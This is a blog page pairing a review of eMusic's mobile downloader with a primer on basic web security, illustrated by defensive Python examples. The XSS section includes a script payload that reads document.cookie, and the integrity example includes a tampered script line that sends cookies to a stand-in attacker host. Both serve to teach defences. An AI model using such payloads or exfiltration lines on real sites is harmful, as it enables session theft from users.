Simplicity Over Beauty. Functionality Over Features.

I’m a fan of many of the services that allow the legal purchase of music online. One service that I’ve come to enjoy over the years is emusic which, for quite some time, didn’t provide a way to download music other than through their website and desktop downloader.

As seems common, a developer decided to scratch his own itch and release a mobile downloader application. If it wasn’t for his application I could have easily moved over to Amazon MP3 or Google Music just based on the ease of purchase and growing selections. Fast forward a year and emusic figured out people wanted a mobile downloader. A beta was released.

And it was buggy and had features that, as a user, I really don’t care about while having oddly implemented features that seemed core to the downloader experience. Let me explain: I wanted to search, purchase and download music. I think that those three actions are nearly universal for a music purchase and download app. Here is the list of features for the official emusic application:

  • Listen to any MP3 files stored on your phone through the music player
  • Get song recommendations based on your listening habits
  • Create playlists tailored to your every mood
  • Browse an artist’s dossier (discographies, biographies, photos, features, and related artists) while you listen to music
  • Access eMusic’s unique charts
  • Search eMusic’s catalog and listen to track samples
  • Download music
  • Listen to eMusic Radio (available to U.S. members only)
  • Save for Later
  • Access account details

(Source)

This is how I ended up feeling about the emusic application: it searched, purchased (or crashed), downloaded in a weird filename format (or crashed), wanted to search my existing library to give recommendations (sort of weird) and let me listen to samples (or crashed). When the application crashed there was a chance that emusic would think I had downloaded the song when I hadn’t received it, meaning I would need to contact support and ask for a redownload.

The ‘weird format’ may sound, well, weird but it’s true. I’m someone who likes to listen to music in many settings. The two most common ways I listen to music are from a laptop or via my phone. Obviously this means I’m at least using two different music players (right now it’s Nightingale and Player Pro) and the need to organize music is important. When I download via the emusic website or via the indie developers app I get a nice directory structure with artist and songs named in a way that makes sense to me. When I download from the emusic mobile application, well, see for yourself:

In fairness many of the crashing bugs have been fixed and it’s a better client than it was, but I still buy and download using the third-party developer’s application. It’s simpler, stable and lets me do the three tasks I need out of a downloader.

So why didn’t emusic decide to license/buy the downloader that the developer released? I’m not totally sure but I have an inkling that they wanted to show they could outdo the simple app. Pretty interface, more features, samples, etc. As a user I care less about how it looks and much more about how functional the application is.

Today I still use the indie developer’s emusic downloader instead of the official app and I recommend its use over emusic’s official app. I want an application that lets me get the music I want and delivers a consistent user experience (read: simple flow and doesn’t crash). If it’s not pretty or doesn’t have every single cool feature under the sun, well, I’m ok with that.

Basic Web Security For The Average User

The Web has been around long enough that Web applications are a part of almost everyone’s daily life. Even when a user is on a mobile device they are likely interacting with Web services. Sadly there are still many applications and services out there which lack what should be the minimum level of security. Luckily there are some work-arounds users can apply to protect themselves when an application’s security practices are less than stellar.

Secure Sockets Layer (SSL)

What is it?

SSL (today its successor TLS, but the name stuck) encrypts the Web traffic between your browser and the originating server, so someone watching the network sees only ciphertext rather than your pages, passwords and cookies. It also lets the browser check, via the server’s certificate, that it is talking to the site named in the address bar. If SSL is not in use the Web traffic is viewable, and modifiable, by anyone on the wire, for example anyone sharing an open Wi-Fi network with you.

Can I increase my safety?

The best defense is diligence: whenever you are about to enter data or log in, and for as long as you stay logged in, check that the URL starts with ‘https:’. Keep in mind that https only tells you the connection to that site is encrypted and the server holds a certificate for the name in the address bar; it says nothing about whether the site itself is trustworthy.

For Firefox and Chrome users the EFF provided an extension called HTTPS Everywhere which rewrites requests to use SSL wherever the site supports it. (The EFF has since retired it, because current browsers ship an equivalent HTTPS-only mode in their settings.)

Cookie Flags

What is it?

Cookies are small pieces of data the server asks your browser to store and send back with later requests; they are how a site recognizes you after you log in, which also makes a stolen session cookie as good as your password. Over the years a few flags have been added to cookies that make them harder to steal. Two of them are Secure and HttpOnly. Secure tells the browser to send the cookie only when the connection is using SSL; on a plain http request the cookie is simply left out, so it never crosses the wire in the clear. HttpOnly keeps the cookie out of reach of JavaScript (it does not show up in document.cookie), so a script injected into the page cannot read it; the browser still attaches it to ordinary HTTP/HTTPS requests back to the originating server. Both flags are set by the site, so as a user you can look for them in the browser’s cookie viewer but cannot add them yourself.
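To make the two flags concrete, here is an added example (not code from the original post) that parses Set-Cookie headers, models the browser rules just described, and audits a session cookie for the missing flags. The header strings are constructed for illustration; the audit wording is this example’s own.

```python
"""Parse Set-Cookie headers and audit the Secure / HttpOnly flags.

Added example for this post; not code from the original page.
The sample headers at the bottom are constructed, not captured from a real site.
"""
from dataclasses import dataclass, field


@dataclass
class Cookie:
    name: str
    value: str
    # attribute name (lowercased) -> value, or True for bare flags like Secure
    attrs: dict = field(default_factory=dict)

    @property
    def secure(self) -> bool:
        return "secure" in self.attrs

    @property
    def httponly(self) -> bool:
        return "httponly" in self.attrs


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value, e.g. 'sid=abc; Path=/; Secure; HttpOnly'."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return Cookie(name.strip(), value.strip(), attrs)


def browser_sends(cookie: Cookie, scheme: str) -> bool:
    """Model of the browser rule: a Secure cookie only travels over https."""
    return scheme == "https" or not cookie.secure


def script_can_read(cookie: Cookie) -> bool:
    """Model of the browser rule: HttpOnly cookies are hidden from document.cookie."""
    return not cookie.httponly


def audit(header: str) -> list:
    """Findings a reviewer would raise for a session cookie set with this header."""
    c = parse_set_cookie(header)
    findings = []
    if not c.secure:
        findings.append("missing Secure: sent in the clear over http, readable on the wire")
    if not c.httponly:
        findings.append("missing HttpOnly: readable by injected JavaScript (XSS)")
    return findings


# Constructed sample headers for a login session cookie.
WEAK = "session=7f3c9a; Path=/"
HARDENED = "session=7f3c9a; Path=/; Secure; HttpOnly"

if __name__ == "__main__":
    for h in (WEAK, HARDENED):
        print(h, "->", audit(h) or "ok")
```

The same check can be run against the Set-Cookie headers shown in a browser’s developer tools for any site you use; a login cookie without both flags is the kind of gap the rest of this post is working around.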

Can I increase my safety?

Right now I’m not aware of any extensions which force cookies to be HttpOnly on the browser side. If you are aware of a good mitigation please comment.

Cross Site Scripting (XSS)

What is it?

OWASP defines XSS like so:

Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

(Source)
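The OWASP definition above is easiest to see in code. The following is an added example, not code from the original post or from OWASP: a search page that echoes the query unescaped (the bug), the same page with the query HTML-encoded on output (the fix), and a constructed attacker payload that tries to read document.cookie, which is exactly what the HttpOnly flag from the previous section blocks.

```python
"""Reflected XSS: the vulnerable output and the encoded output, side by side.

Added example for this post, not code from the original page or from OWASP.
The page templates and the attacker input are constructed for illustration.
"""
import html


def render_unsafe(query: str) -> str:
    """The classic bug: user input is pasted straight into the HTML."""
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """The fix: encode the input for the HTML context it lands in."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def attribute_safe(value: str) -> str:
    """Attribute values must be quoted AND escaped; quote=True also encodes quotes."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


# Constructed attacker input. A real payload would ship the cookie to a
# collector rather than pop an alert, but the injection point is the same.
PAYLOAD = "<script>alert(document.cookie)</script>"


def contains_live_script(page: str) -> bool:
    """Crude check used only in this example: does a raw <script> tag survive into the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))  # the browser would run the injected script
    print(render_safe(PAYLOAD))    # the browser shows the text literally
```

Note that encoding depends on where the data lands: the HTML-body encoding in `render_safe` is not sufficient inside a JavaScript string or a URL, which is why a template engine that escapes by default beats hand-rolled calls.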

Can I increase my safety?

By installing NoScript or something similar and turning on Google Safe Browsing you can lessen the chance of a successful XSS attack, but it is far from a silver bullet: NoScript blocks scripts on sites you have not trusted, while XSS by definition runs on a site you do trust. There is work being done to make XSS attacks much harder (Content Security Policy, which lets a site tell the browser which scripts are allowed to run, is the main such effort) but it was not yet in use when this was written.

Cross Site Request Forgery

What is it?

A cross-site request forgery happens when a page on one site makes your browser send a request to a different site where you are logged in, to do something on your behalf. Your browser attaches that site’s cookies automatically, so the site cannot tell the forged request from one you made yourself. Cross-site requests are also used by developers on purpose (embedded images, widgets and the like), which is exactly why browsers allow them, but that doesn’t make the vulnerability any less dangerous. (Browsers have since added the SameSite cookie attribute, which keeps cookies off many cross-site requests, but it only helps where the site sets it.)

Can I increase my safety?

Wikipedia has a good page on the subject:

Browser extensions such as RequestPolicy (for Mozilla Firefox) can prevent CSRF by providing a default-deny policy for cross-site requests. However, this can significantly interfere with the normal operation of many websites. The CsFire extension (also for Firefox) can mitigate the impact of CSRF with less impact on normal browsing, by removing authentication information from cross-site requests. The NoScript extension mitigates CSRF threats by distinguishing trusted from untrusted sites, and removing payloads from POST requests sent by untrusted sites to trusted ones.

(Source)
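The extensions quoted above all work by stripping the victim’s credentials from cross-site requests on the browser side. The site-side fix is to require something the attacker’s page cannot obtain. The following is an added example, not code from the post or from Wikipedia: a money-transfer handler that trusts the session cookie alone, beside one that also demands a per-session token that only a page on the same origin can read. The session store, request shape and the attacker’s form are constructed for illustration.

```python
"""CSRF: a forged cross-site POST against an unprotected and a token-protected handler.

Added example for this post; not code from the original page.
The in-memory session store, the request dictionaries and the attack
scenario are constructed to illustrate the mechanism.
"""
import hmac
import secrets

SESSIONS = {}  # session id -> {"user": name, "csrf": token}; in-memory for the example


def login(user: str) -> str:
    """Create a session and a random CSRF token bound to it; return the cookie value."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """The site embeds this in its own forms; other origins cannot read that page."""
    return SESSIONS[sid]["csrf"]


def transfer_vulnerable(cookies: dict, form: dict) -> str:
    """Trusts the session cookie alone, so any site the victim visits can trigger it."""
    session = SESSIONS.get(cookies.get("sid"))
    if session is None:
        return "401 not logged in"
    return f"200 moved {form['amount']} from {session['user']} to {form['to']}"


def transfer_protected(cookies: dict, form: dict) -> str:
    """Requires the synchronizer token in addition to the cookie."""
    session = SESSIONS.get(cookies.get("sid"))
    if session is None:
        return "401 not logged in"
    submitted = form.get("csrf", "")
    # Constant-time comparison so the token cannot be guessed byte by byte via timing.
    if not hmac.compare_digest(submitted, session["csrf"]):
        return "403 bad csrf token"
    return f"200 moved {form['amount']} from {session['user']} to {form['to']}"


def simulate() -> dict:
    """Constructed scenario: the victim logs in, then visits an attacker page that
    auto-submits <form action=".../transfer" method="post">. The browser attaches
    the victim's cookie; the attacker's form carries no token."""
    sid = login("alice")
    cookies = {"sid": sid}
    forged = {"to": "mallory", "amount": "1000"}
    legit = {"to": "bob", "amount": "10", "csrf": csrf_token_for(sid)}
    return {
        "forged_vs_vulnerable": transfer_vulnerable(cookies, forged),
        "forged_vs_protected": transfer_protected(cookies, forged),
        "legit_vs_protected": transfer_protected(cookies, legit),
    }


if __name__ == "__main__":
    for case, result in simulate().items():
        print(f"{case}: {result}")
```

The token works because the same-origin policy stops the attacker’s page from reading the bank’s HTML, so it can forge the request but not the token inside it; a browser-side SameSite cookie adds a second, independent barrier.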

Password Hashing

What is it?

When an application stores passwords it should do so in a way that it never keeps the password you’ve entered: it stores a salted, deliberately slow hash and checks a login by recomputing it. It may sound odd but it is pretty trivial for application developers to do. Yet sometimes they forget to implement hashing, use a fast unsalted hash such as plain MD5 or SHA-1 that is cracked quickly once the database leaks, or the application is ancient and was never updated to do this.
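What “doesn’t actually know the password” looks like in practice, as an added example that is not code from the original post: a per-user random salt, a slow standard-library key derivation (PBKDF2-HMAC-SHA256), and a constant-time check. The stored record format is this example’s own; the iteration count follows OWASP’s published guidance for this algorithm and should be raised over time.

```python
"""Store passwords so a stolen database row does not reveal them.

Added example for this post; not code from the original page.
Record format 'pbkdf2_sha256$iterations$salt$hash' is this example's own.
"""
import hashlib
import hmac
import secrets

ITERATIONS = 600_000  # OWASP guidance for PBKDF2-HMAC-SHA256; raise as hardware speeds up


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return a record suitable for storage; the password itself is not in it."""
    salt = secrets.token_bytes(16)  # fresh per user, so equal passwords hash differently
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and parameters and compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, digest_hex = parts
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def plaintext_leaks(password: str, stored: str) -> bool:
    """What a leaked row gives away: True only if the password is visible in it."""
    return password in stored


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print("login ok:", verify_password("correct horse battery staple", record))
    print("wrong password ok:", verify_password("password1", record))
```

Storing the algorithm and iteration count in the record is what lets a site raise the work factor later and re-hash each user on their next successful login; a memory-hard function such as scrypt or Argon2 is the better choice where a library for it is available.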

Can I increase my safety?

The best thing a user can do to protect against a disclosure is to use a different password for each site, so that one leaked database does not unlock your other accounts. Understandably this can sound scary: people feel like they have to remember too many passwords already. Thankfully there are applications which can generate, store and remember these passwords and let you remember just one. Here are a few popular choices:

External References

What is it?

It’s very common for Web applications to include JavaScript, images or CSS from other locations. The reason is usually to increase performance by sharing the browser’s cache, to use a content delivery network, to include ads or analytics or, in some cases, laziness. The problem for the user comes when the remote content becomes unsafe (the third party is compromised or changes hands) or the content behaves in ways the user is not OK with, such as tracking. An included script runs with the full privileges of the page that includes it, so a site is only as secure as everything it loads.

It can also cause problems for the application including the content. For more information see my previous post on trusting others to host your content.

Can I increase my safety?

Since, in most cases, the external references are required for the application to work, it is quite hard to fully protect against them in the browser, but there are still some things that can help.
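From the site’s side rather than the user’s, the check that addresses this is Subresource Integrity (SRI), a browser feature not covered in the original post: the including page states a hash of the script it expects, and the browser refuses to run the file if the bytes fetched from the third party differ. The following added example (not code from the post) computes the `integrity` value for a constructed library file and models the browser’s comparison against a tampered copy.

```python
"""Subresource Integrity: pin an externally hosted script to its hash.

Added example for this post; SRI is a later browser feature the original
page does not discuss. The script contents below are constructed.
"""
import base64
import hashlib


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the integrity value: '<algo>-<base64 digest>' of the exact bytes served."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def script_tag(src: str, content: bytes) -> str:
    """The tag the including site ships. crossorigin is required for cross-origin SRI."""
    return (
        f'<script src="{src}" integrity="{sri_hash(content)}" '
        f'crossorigin="anonymous"></script>'
    )


def browser_would_execute(tag_integrity: str, fetched: bytes) -> bool:
    """Model of the browser check: any change at the CDN fails the match and the script is dropped."""
    algo = tag_integrity.partition("-")[0]
    return sri_hash(fetched, algo) == tag_integrity


# Constructed library file and a tampered copy that exfiltrates cookies.
LIB = b"window.lib = { version: '1.0' };\n"
TAMPERED = LIB + b"fetch('https://evil.example/?c=' + document.cookie);\n"

if __name__ == "__main__":
    tag = script_tag("https://cdn.example/lib.js", LIB)
    print(tag)
    print("genuine copy runs:", browser_would_execute(sri_hash(LIB), LIB))
    print("tampered copy runs:", browser_would_execute(sri_hash(LIB), TAMPERED))
```

The trade-off is that the site must update the hash whenever it upgrades the library, which is why SRI suits pinned versions and not “latest” URLs; for scripts a site cannot pin, the only remaining control is the user’s script blocker.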

One more thing…

While not specifically related to the bare minimum of remote Web application security, it’s important to keep your browser and extensions/plugins updated with the latest patches and supported versions. This helps protect against sites which host browser exploits, whether on purpose or because they were themselves compromised (of course, don’t purposely go visit such a site!). For plugins, Mozilla provides a plugin check page which seems to work for Chrome to some degree as well. Go check your versions!